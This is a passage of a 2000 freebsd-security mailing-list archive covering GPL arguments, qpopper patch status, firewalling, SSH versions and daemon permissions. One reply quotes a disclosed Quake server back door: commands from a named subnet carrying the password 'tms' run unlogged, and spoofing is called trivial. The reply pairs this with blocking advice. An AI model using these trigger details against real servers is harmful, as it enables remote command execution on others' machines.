> >On Mon, 15 May 2000, Brett Glass wrote:
> >
> > > According to Bruce Perens, the next version of the GPL will impose
> > > nasty conditions upon service providers and merchants who use GPLed
> > > code, such as requiring them to reveal all of their in-house additions
> > > to it even if they do not redistribute it.
> >
> >And how much FUD spinning is that?  SPIN IT BABY!!
> 
> It's not FUD; it is the absolute truth.
I have the tape of the session > at the February LinuxWorld in which Bruce said that -- emphatically. > > One of these days, people will begin to get the idea that the GPL is > not actually about freedom. It is, rather, a weapon of spite and an > attempt to accumulate power and control. I'm wondering about the following situation: Let's say postgresql was GPL'd (someone suggested it recently), now I have some custom mods to it that I use for the backend of some e-commerce site that charges a fee for it's use, perhaps some business to business application. Shouldn't I be obligated to release my source (at least my modified Postgresql source) because I'm selling the application which incorperates a GPL'd program that I've modified even though it's run over the web? Doesn't that qualify as some sort of distribution which would fall under the GPL's requirements that I distribute my code? Just wondering... -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:14: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 5C77437B89D for ; Mon, 15 May 2000 11:13:53 -0700 (PDT) (envelope-from mike@bill.minivend.com) Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id OAA31464 for security@freebsd.org; Mon, 15 May 2000 14:12:17 -0400 Date: Mon, 15 May 2000 14:12:17 -0400 From: Mike Heins To: security@freebsd.org Subject: Re: Back door in Minivend Message-ID: <20000515141217.A31441@bill.minivend.com> Reply-To: mike@minivend.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3us Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I can assure you that there are no author-inserted back doors in Minivend, as I am the author. 8-) The source is completely open and has been examined by quite a few people. If anyone hears of any security problems, let me know directly. I am positive that there has not been a vulnerability posted to Bugtraq; certainly one of the thousands of Minivend users would have brought that to my attention. (re-sent slightly changed to the list so it won't be a not-read quote in just another GPL vs. BSD license thread...) Regards, Mike Heins -- Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 phone +1.513.523.7621 fax 7501 Friends don't let friends use Outlook. 
-- Bob Blaylock To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:36: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id B054537B5EE for ; Mon, 15 May 2000 11:36:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA04291; Mon, 15 May 2000 12:35:54 -0600 (MDT) Message-Id: <4.3.1.2.20000515122445.04077a10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 15 May 2000 12:35:49 -0600 To: Alfred Perlstein From: Brett Glass Subject: Re: (forw) Back door in Minivend Cc: security@FreeBSD.ORG In-Reply-To: <20000515114427.B249@fw.wintelcom.net> References: <4.3.1.2.20000515115811.045e6690@localhost> <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:44 PM 5/15/2000, Alfred Perlstein wrote: >I'm wondering about the following situation: > >Let's say postgresql was GPL'd (someone suggested it recently), >now I have some custom mods to it that I use for the backend of >some e-commerce site that charges a fee for it's use, perhaps some >business to business application. > >Shouldn't I be obligated to release my source (at least my modified >Postgresql source) because I'm selling the application which >incorperates a GPL'd program that I've modified even though it's >run over the web? Doesn't that qualify as some sort of distribution >which would fall under the GPL's requirements that I distribute my >code? No, it isn't "distribution" of the work. 
Perens claims that it is a "public performance for profit," something which is not covered under the GPL now but would be under the new version. Of course, it's unclear if this Perens' claim would stand up in court, since -- unlike a musical performance -- running a program does not cause the text of the program to be transmitted or rendered. But then, courts are ruling in favor of the MPAA and RIAA on similar issues, so they might wrongly rule in favor of the FSF, which is at least as greedy and Draconian as those other two organizations, IMHO. A better example, which shows the real danger, is as follows. Suppose that you run your e-commerce server on Debian Linux. Under Perens' proposed regime, you would be forced to give away (for free!) the code you used in your business because it was serving the public and running on a GPLed OS. Talk about a nasty land grab. --Brett If nothing else, the brain is an educational toy. -- Tom Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:50:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8C90F37B50C for ; Mon, 15 May 2000 11:50:37 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id OAA54366; Mon, 15 May 2000 14:49:59 -0400 (EDT) (envelope-from cjc) Date: Mon, 15 May 2000 14:49:59 -0400 From: "Crist J. 
Clark" To: Brett Glass Subject: Re: (forw) Back door in Minivend Message-ID: <20000515144959.A54078@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <4.3.1.2.20000515115811.045e6690@localhost> <4.3.1.2.20000515094342.045eb7e0@localhost> <20000515114427.B249@fw.wintelcom.net> <4.3.1.2.20000515122445.04077a10@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.1.2.20000515122445.04077a10@localhost>; from brett@lariat.org on Mon, May 15, 2000 at 12:35:49PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -chat, please. Actually, we could use a freebsd-gnu-tirade list. Better yet, freebsd-dev-null. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13: 2: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F6D337B578; Mon, 15 May 2000 13:02:06 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA78466; Mon, 15 May 2000 13:02:06 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:02:06 -0700 (PDT) From: Kris Kennaway To: Brett Glass Cc: Alfred Perlstein , security@FreeBSD.ORG Subject: Re: (forw) Back door in Minivend In-Reply-To: <4.3.1.2.20000515122445.04077a10@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Brett Glass wrote: > No, it isn't "distribution" of the work. 
Perens claims that it is > a "public performance for profit," something which is not covered > under the GPL now but would be under the new version. Brett, please take this crap *off* freebsd-security. It's blatantly off-topic. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:17:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 399F837B658; Mon, 15 May 2000 13:17:39 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA80408; Mon, 15 May 2000 13:17:39 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:17:39 -0700 (PDT) From: Kris Kennaway To: Visigoth Cc: freebsd-security@freebsd.org Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Visigoth wrote: > I was just curious as to what the freebsd stance on the possible > qpopper-2.53 vuln as is being discussed on BUGTRAQ. Has this vuln been > tested with the freebsd port? Are there known issues? I am going to > (hopefully) be taking a look at the "exploitability" of the freebsd port > for qpopper-2.53 but I was wondering if someone had already done all the > work. I under stand that the exploit posted on bugtraq would need to be > modified, but I am wondering if the security/ports team have taken care of > the offending piece of code already (which is so often the case)... 
I'm not sure which of the reported vulnerabilities you're referring to, but in either case I know of the answer is "Blah blah blah, NOT vulnerable..." * BSD systems dont have the tempfile creation problems which can deny service to a user's mailbox (only SYSV directory semantics) * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the bugtraq advisory. It's been on my plate to release an advisory about this since it was fixed, but I've been sidetracked with other issues. My apologies - I'll ty and get my backlog cleared this week. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:41: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id DCBEB37B6A0; Mon, 15 May 2000 13:41:03 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id QAA80539; Mon, 15 May 2000 16:41:02 -0400 (EDT) From: Igor Roshchin Message-Id: <200005152041.QAA80539@giganda.komkon.org> Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: from "Kris Kennaway" at "May 15, 2000 01:17:39 pm" To: "Kris Kennaway" Date: Mon, 15 May 2000 16:41:01 -0400 (EDT) Cc: Visigoth , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon, 15 May 2000, Visigoth wrote: > > > I was just curious as to what the freebsd stance on the possible > > qpopper-2.53 vuln as is being discussed on BUGTRAQ. Has this vuln been > > tested with the freebsd port? Are there known issues? 
I am going to > > (hopefully) be taking a look at the "exploitability" of the freebsd port > > for qpopper-2.53 but I was wondering if someone had already done all the > > work. I under stand that the exploit posted on bugtraq would need to be > > modified, but I am wondering if the security/ports team have taken care of > > the offending piece of code already (which is so often the case)... > > I'm not sure which of the reported vulnerabilities you're referring to, > but in either case I know of the answer is "Blah blah blah, NOT > vulnerable..." > > * BSD systems dont have the tempfile creation problems which can deny > service to a user's mailbox (only SYSV directory semantics) > * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the > bugtraq advisory. > > It's been on my plate to release an advisory about this since it was > fixed, but I've been sidetracked with other issues. My apologies - I'll ty > and get my backlog cleared this week. > > Kris > > ---- Although I am not sure which vulnerability the author of the original question is talking about, I see that there was a recent patch (April 17) related to (if I read it correctly) some buffer overflow, or smth. like that... (and IIRC there was something like that mentioned on BUGTRAQ some time ago) May be the author of the patch can clear up the question ? 
(sorry I don't have time/possibility to check the cvs logs now to find out how it was) Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:44:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9018737B578; Mon, 15 May 2000 13:44:12 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA83309; Mon, 15 May 2000 13:44:12 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:44:11 -0700 (PDT) From: Kris Kennaway To: Igor Roshchin Cc: Visigoth , freebsd-security@FreeBSD.ORG Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: <200005152041.QAA80539@giganda.komkon.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Igor Roshchin wrote: > > * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the > > bugtraq advisory. > Although I am not sure which vulnerability the author of the original question > is talking about, I see that there was a recent patch > (April 17) related to (if I read it correctly) some buffer overflow, > or smth. like that... > (and IIRC there was something like that mentioned on BUGTRAQ some time > ago) See above ;-) Kris ---- In God we Trust -- all others must submit an X.509 certificate. 
-- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 14: 0:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 4C3E337B81C for ; Mon, 15 May 2000 14:00:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id RAA41227; Mon, 15 May 2000 17:00:30 -0400 (EDT) (envelope-from wollman) Date: Mon, 15 May 2000 17:00:30 -0400 (EDT) From: Garrett Wollman Message-Id: <200005152100.RAA41227@khavrinen.lcs.mit.edu> To: Doug Barton Cc: freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <391E4BCC.6EA3DB59@gorean.org> References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> <200005130137.TAA09188@nomad.yogotech.com> <391E4BCC.6EA3DB59@gorean.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I concur. I've always wondered why (info-)zip hasn't enjoyed more > popularity in the unix world. I used it extensively back when I ran > OS/2, and it has a lot of nice features. Because post-archive-compression compresses better, if the contents of the files are similar. Also because people have a 25-year history with `tar', `ar', and similar UNIX programs; the `zip' and `unzip' programs have a non-intuitive command-line syntax, by comparison. 
-GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 17:13: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 2878C37B5CF for ; Mon, 15 May 2000 17:12:59 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.9.3/8.9.3) with ESMTP id BAA86599; Tue, 16 May 2000 01:10:33 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id BAA01357; Tue, 16 May 2000 01:10:31 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200005160010.BAA01357@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Marc Silver Cc: "Dan O'Connor" , freebsd-security@FreeBSD.ORG, brian@hak.lan.Awfulhak.org Subject: Re: Firewall Rules In-Reply-To: Message from Marc Silver of "Fri, 05 May 2000 09:01:28 +0200." <20000505090128.A4456@draenor.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 16 May 2000 01:10:29 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Do you feel that userland ppp is as safe as the kernel firewalling > options? I would like to gain a better understanding. What are the > major differences between the two? The only real difference is that ppp can filter packets based on whether they will cause a connection attempt (the dial filter) and can stop them from effecting the alive timer (the alive filter). ipfw is much more powerful, but for the standard deny/permit stuff that you're after, ppp is acceptable. If you use ipfw with ppp and want to use (say) ``tun0'' in your rules, make sure you run ppp with ``-unit 0'' to ensure that the two are in sync. 
[.....] > Thanks, > Marc -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 20: 9:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id 0C4D837B792 for ; Mon, 15 May 2000 20:09:50 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id UAA01096 for security@freebsd.org; Mon, 15 May 2000 20:10:00 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 20:10:00 -0700 From: Dann Lunsford To: security@freebsd.org Subject: UDP port 27910 being tried Message-ID: <20000515200959.A474@greycat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Over the past couple of days, I've noted many instances of attempted connections to UDP port 27910 on my 4-STABLE box. I haven't been able to find a reference to this port on the Usual Places(tm), so this *might* be something new. Has anyone out there seen anything of this? -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. 
-- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 20:36:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 4AE7C37B9F3 for ; Mon, 15 May 2000 20:36:40 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 3622 invoked by uid 1021); 16 May 2000 03:40:52 -0000 Mail-Followup-To: freebsd-security@freebsd.org, dann@greycat.com Date: Tue, 16 May 2000 04:40:52 +0100 From: User Datagram Protocol To: Dann Lunsford Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000516044052.B2139@closed-networks.com> Reply-To: User Datagram Protocol References: <20000515200959.A474@greycat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000515200959.A474@greycat.com>; from dann@greycat.com on Mon, May 15, 2000 at 08:10:00PM -0700 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dann, On Mon, May 15, 2000 at 08:10:00PM -0700, Dann Lunsford wrote: > Over the past couple of days, I've noted many instances of attempted connections > to UDP port 27910 on my 4-STABLE box. I haven't been able to find a reference > to this port on the Usual Places(tm), so this *might* be something new. Has > anyone out there seen anything of this? udp port 27910 is the port for the Quake 2 game server. It's possible that people have mistaken your box for a Quake 2 server. It's also possible that they're trying to execute arbitrary commands on your box. Read http://www.insecure.org/sploits/quake.backdoor.html formore details. Mark Zielinski of RSI/repsec reported this one. 
Naturally, if you're running the server in a sandbox (e.g. plain chroot w/setuid or even as far as jail) then the damage would be muchly limited in the event of this compromise occuring. > ID software blatantly put a backdoor in Quake 1/2 and QuakeWorld including both the Linux/Solaris Quake2. RCON commands sent from the subnet 192.246.40.0/24 and containing the password "tms" are automaticly executed on the server without being logged. So, filtering 192.246.40.0/24 port 27910 is probably also an option. udp spoofing is trivial. I can't believe Id did this. Regards -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 22:26:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id CE71137BA43; Mon, 15 May 2000 22:26:19 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id WAA01576; Mon, 15 May 2000 22:26:18 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 22:26:18 -0700 From: Dann Lunsford To: security@freebsd.org Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000515222618.A1465@greycat.com> References: <20000515200959.A474@greycat.com> <20000516044052.B2139@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516044052.B2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 04:40:52AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quake? Good Grief. 
Must have goofed when I looked for known sploits; been a loooooonnnnnngggg day :-(. Thanks to all who responded. I've blocked it at the FW. Sheesh. You think ID would Know Better... -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. -- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 22:26:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id CE71137BA43; Mon, 15 May 2000 22:26:19 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id WAA01576; Mon, 15 May 2000 22:26:18 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 22:26:18 -0700 From: Dann Lunsford To: security@freebsd.org Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000515222618.A1465@greycat.com> References: <20000515200959.A474@greycat.com> <20000516044052.B2139@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516044052.B2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 04:40:52AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quake? Good Grief. Must have goofed when I looked for known sploits; been a loooooonnnnnngggg day :-(. Thanks to all who responded. I've blocked it at the FW. Sheesh. You think ID would Know Better... -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. 
-- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:12:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.menzor.dk (menzor.org [195.249.147.160]) by hub.freebsd.org (Postfix) with ESMTP id 349B837B8A7 for ; Tue, 16 May 2000 00:12:01 -0700 (PDT) (envelope-from ml@seeberg.dk) Received: from sos (userhost.cma.dk [130.228.127.200] (may be forged)) by www.menzor.dk (8.8.8/8.8.8) with SMTP id JAA13675 for ; Tue, 16 May 2000 09:56:54 +0200 (CEST) (envelope-from ml@seeberg.dk) Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> From: "Morten Seeberg" To: Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I often find myself messing around in all these different security schemes, features, programs and so on. Does anyone know a good link to an explanation of these? 
Like why would I want to use SSHx instead of SSHxx, and why encrypt with RSA instead of DES, blowfish and whatnot :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /\/\orten $eeberg, Systems Consultant @ Merkantildata - Enterprise Solutions #echo 'System Administrators suck :)' > /dev/console To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:31:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 29E9437B537 for ; Tue, 16 May 2000 00:31:28 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 22359 invoked from network); 16 May 2000 07:27:54 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 16 May 2000 07:27:54 -0000 To: security@freebsd.org Subject: Re: SSH1, SSH2, RSA, DES, etc etc From: sen_ml@eccosys.com In-Reply-To: <00bf01bfbf06$2d28f0b0$deff58c1@sos> References: <00bf01bfbf06$2d28f0b0$deff58c1@sos> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000516163125D.1001@eccosys.com> Date: Tue, 16 May 2000 16:31:25 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 41 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Morten Seeberg" Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> > Does anyone know a good link to an explanation of these? not off-hand -- for crypto stuff, the book "applied cryptography 2nd ed" has pretty good descriptions of various algorithms. the handbook of applied cryptography is available via http or ftp as well, but i haven't read that myself. perhaps someone can provide a link. 
> Like why would I want to use SSHx instead of SSHxx, there have been some posts to the ssh mailing list concerning why use ssh1 over ssh2 or vice versa. you might consider asking there. things going for ssh1: -tested more heavily (much longer history of being deployed) -protocol is much simpler than ssh2 (less to screw up in implementation and design) things going for ssh2: -ietf drafts exist for ssh2 (will probably reach rfc status if this hasn't happened already) -has fixed a problem (may be more than one?) that exists in the ssh1 protocol there are other differences too, but none of them seemed to be clearly favorable to me. btw, iirc, openssh has (or will have soon) support for both protocol versions. > and why encrypt with RSA instead of DES, blowfish and whatnot :) to nitpick: you probably wouldn't want to be comparing a public key algorithm (RSA) w/ a symmetric key algorithm (DES) in this kind of context :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:34:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id E92AF37B60B for ; Tue, 16 May 2000 00:34:50 -0700 (PDT) (envelope-from je@interact.se) Received: from wolfie.interact.se (je@wolfie.interact.se [193.15.98.202]) by smtp1.interact.se (InterACT Mailer) with ESMTP id JAA20537; Tue, 16 May 2000 09:36:04 +0200 (CEST) Date: Tue, 16 May 2000 09:34:58 +0200 (CEST) From: Jonas Eriksson X-Sender: je@localhost To: sen_ml@eccosys.com Cc: security@FreeBSD.ORG Subject: Re: SSH1, SSH2, RSA, DES, etc etc In-Reply-To: <20000516163125D.1001@eccosys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >btw, iirc, openssh has (or will have soon) support for both protocol >versions. 
> OpenSSH has support for SSH1 and SSH2 http://www.OpenSSH.com/ -- Jonas Eriksson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 4:48: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 39C7737B95A for ; Tue, 16 May 2000 04:48:06 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 21818 invoked by uid 1000); 16 May 2000 11:48:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 May 2000 11:48:05 -0000 Date: Tue, 16 May 2000 06:48:05 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: FreeBSD-security Mailing List Subject: pid file for named Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a chmod -R bind:bind /etc/named However, the pid file, /var/run/named.pid, which named tries to write out one cannot give the proper permissions for, because it resides in a root-owned directory /var/run. Granted, named writes out this file before it drops privileges, and 